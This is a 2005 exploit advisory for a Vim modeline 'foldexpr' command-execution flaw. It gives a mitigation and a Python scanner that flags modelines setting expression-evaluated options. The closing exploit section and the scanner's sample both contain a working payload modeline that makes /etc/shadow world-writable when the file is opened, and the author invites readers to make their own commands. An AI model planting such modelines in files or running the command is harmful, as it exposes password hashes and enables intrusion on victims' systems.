Vendor: Vim Text Editor
By: str0ke
CVSS: 7,5 (HIGH)
Type: Command Execution
CWE: 78
Product Name: Vim Text Editor
Affected Version From: Vim 5.x
Affected Version To: Vim 7.x
Patch Exists: No
Platforms Tested: All
2005

Vim Fold Expression Command Execution Vulnerability

This vulnerability allows an attacker to execute arbitrary commands when a user opens a text file with Vim. The attacker inserts a modeline at the top of the file that sets a malicious fold expression ('foldexpr'), which Vim evaluates when the file is opened. This can be used to gain access to the system: for example, the command can change the permissions of a file such as /etc/shadow.

Mitigation:

Disable the 'modeline' option in Vim, or use a different text editor.
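
A defensive check to go with this mitigation, as an added example that is not part of the original advisory or of Vim: it scans the lines Vim inspects for modelines and reports any that set an expression-evaluated option such as foldexpr. The function names, the option list and the sample text are assumptions made for this illustration; the window of 5 lines is Vim's default 'modelines' value.

```python
import re

MODELINES = 5  # Vim's default: only the first and last 5 lines are checked
# Options whose value Vim evaluates as an expression (full and short names).
# Assumption: this list is illustrative, not exhaustive.
EXPR_OPTIONS = {"foldexpr", "fde", "foldtext", "fdt", "indentexpr", "inde",
                "formatexpr", "fex", "includeexpr", "inex"}
# Modeline introducer: vi:, vim:, Vim:, ex:, optionally with a version (vim>700:)
INTRO = re.compile(r"(?:^|\s)(?:vi|[vV]im(?:[<=>]?\d+)?|ex):\s*(.*)$")
# Options are separated by ':' or whitespace unless escaped with a backslash.
SEPARATOR = re.compile(r"(?<!\\)[:\s]+")


def parse_modeline(line):
    """Return {option: value} for a modeline, or None if the line has none."""
    match = INTRO.search(line)
    if not match:
        return None
    body = re.sub(r"^set?\s+", "", match.group(1))  # second form: "set opts:"
    options = {}
    for token in SEPARATOR.split(body):
        name, _, value = token.partition("=")
        if re.fullmatch(r"[a-z]+", name):  # skips trailing text such as "*/"
            options[name] = value
    return options


def scan_text(text, modelines=MODELINES):
    """Return (line_number, option, value) for expression options set by modelines."""
    lines = text.splitlines()
    idx_all = range(len(lines))
    # Only the first and last `modelines` lines are inspected by Vim.
    candidates = sorted(set(idx_all[:modelines]) | set(idx_all[-modelines:]))
    findings = []
    for idx in candidates:
        for name, value in (parse_modeline(lines[idx]) or {}).items():
            if name in EXPR_OPTIONS:
                findings.append((idx + 1, name, value))
    return findings


# Constructed sample: line 1 is the modeline from the advisory, the last is benign.
SAMPLE = (
    '/* vim: foldmethod=expr:foldexpr=glob("`chmod\\ 666\\ /etc/shadow`") */\n'
    + "int main(void) { return 0; }\n" * 8
    + "/* vim: set ts=4 sw=4 et: */\n"
)

if __name__ == "__main__":
    for lineno, name, value in scan_text(SAMPLE):
        print(f"line {lineno}: modeline sets {name}={value}")
```

A finding means the file should be reviewed before it is opened in a Vim session that has 'modeline' enabled.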

Exploit-DB raw data:

1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod\ 666\ /etc/shadow`") */

3) if modelines = on, anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow
   
Have fun making your own commands.

The advisory can be found at:
  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

/str0ke

# milw0rm.com [2005-07-25]